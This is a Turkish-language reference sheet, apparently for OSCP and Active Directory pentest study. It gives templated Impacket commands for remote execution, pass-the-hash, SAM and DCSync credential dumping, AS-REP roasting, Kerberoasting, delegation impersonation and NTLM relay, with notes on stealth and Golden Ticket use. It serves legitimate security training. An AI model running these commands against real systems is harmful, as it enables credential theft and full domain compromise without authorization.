Impacket Suite: PsExec/WMIExec/SMBExec, Secretsdump, Kerberos Saldirilari ve NTLM Relay
Impacket araclariyla uzaktan komut yurutme (psexec/wmiexec/smbexec/dcomexec/atexec), credential dumping (secretsdump/DCSync), Kerberos saldirilari (GetNPUsers AS-REP, GetUserSPNs Kerberoasting, getST), ve NTLM relay (ntlmrelayx) referansi.
- Hedefe SMB(445)/RPC(135)/WinRM erisimi
- RCE araclari icin local admin credential (psexec/wmiexec/smbexec)
- AS-REP roast icin gecerli kullanici listesi; Kerberoast icin domain user credential
- impacket kurulu (pipx install impacket / apt install impacket-scripts)
Komutlar
impacket-psexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} impacket-wmiexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} impacket-smbexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} impacket-secretsdump {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} impacket-secretsdump -just-dc {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}} impacket-GetNPUsers {{DOMAIN}}/ -dc-ip {{DC_IP}} -usersfile {{WORDLIST}} -no-pass -format hashcat impacket-GetUserSPNs {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} -request -outputfile spns.hash impacket-getST -spn cifs/{{DC_HOST}} -impersonate Administrator {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} impacket-ntlmrelayx -tf targets.txt -smb2support impacket-atexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} "whoami" impacket-psexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}} Genel Bakis
Impacket, Python ile yazilmis bir ag protokolu kutuphanesi ve arac setidir. OSCP/AD’de uzaktan komut yurutme, credential dumping ve Kerberos saldirilarinin bel kemigidir. Kali’de araclar impacket- onekiyle gelir (or. impacket-psexec); kaynaktan ise examples/ altinda psexec.py olarak bulunur.
Ortak kimlik dogrulama deseni: {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}}. Pass-the-Hash icin parola yerine -hashes LMHASH:NTHASH (LM kisimsiz icin -hashes :{{NTHASH}}). Kerberos icin -k -no-pass (ccache KRB5CCNAME ile).
Uzaktan Komut Yurutme (RCE) — Karsilastirma
Tumu local admin credential gerektirir.
- psexec: Servis olusturup binary diske dusurur, SYSTEM shell verir. En guvenilir ama en gurultulu; AV tetikler.
- wmiexec: WMI/DCOM (135) uzerinden, diske binary dusurmez, yari-interaktif. En sessiz ve OSCP’de tercih edilen.
- smbexec: Servis + SMB, binary dusurmeyen pseudo-shell.
- dcomexec: DCOM nesneleri (MMC20, ShellWindows) ile RCE; psexec/wmiexec bloklandiginda alternatif.
- atexec: Task Scheduler ile tek-komut; cikti bir dosyaya yazilip okunur.
Hangisinin calisacagini hedef konfigurasyonu belirler; biri bloklanirsa digerini deneyin.
Credential Dumping — secretsdump
- Local: SAM + LSA secrets + cached domain credentials cikarir.
-just-dc/-just-dc-ntlm: DC hedefinde DCSync ile NTDS.dit’ten tum domain hashleri (krbtgt dahil).krbtgthashi Golden Ticket icin kullanilir.- Cikan NTLM hashleri dogrudan Pass-the-Hash (psexec/wmiexec/evil-winrm) veya hashcat ile crack icin kullanilir.
Kerberos Saldirilari
- GetNPUsers (AS-REP Roasting):
DONT_REQ_PREAUTHset kullanicilarin AS-REP’i preauth olmadan istenir; cikan hash offline craklenir. Credential gerektirmez (-no-pass), sadece kullanici listesi. - GetUserSPNs (Kerberoasting): SPN tanimli servis hesaplarinin TGS-REP hashleri istenir. Gecerli bir domain user credential yeterli. Cikan
$krb5tgs$hashleri hashcat mode 13100 ile craklenir. - getST (S4U / delegation): Constrained delegation veya Resource-Based Constrained Delegation (RBCD) senaryolarinda
-impersonateile ayricalikli kullaniciyi taklit eden servis ticket’i uretir.
NTLM Relay — ntlmrelayx
SMB signing kapali hedeflerde, yakalanan (or. Responder ile poison edilen) NTLM kimlik dogrulamasini baska makinelere relay eder; basariliysa komut yurutur, SAM dumplar veya LDAP’a relay ile ADCS/RBCD saldirisi yapar. examSafety: restricted — otomatik/MITM bilesenleri OSCP’de dikkatli kullanilmali, sinav kapsamini teyit edin.
Notlar
- Saat senkronu Kerberos icin kritiktir:
KRB_AP_ERR_SKEWhatasindantpdate {{DC_IP}}veyafaketimekullanin. -dc-ip {{DC_IP}}ve/etc/hosts’a DC FQDN eklemek isim cozumleme sorunlarini onler.- Clock/DNS dogru degilse Kerberos tabanli araclar (GetUserSPNs, getST) sessizce basarisiz olur.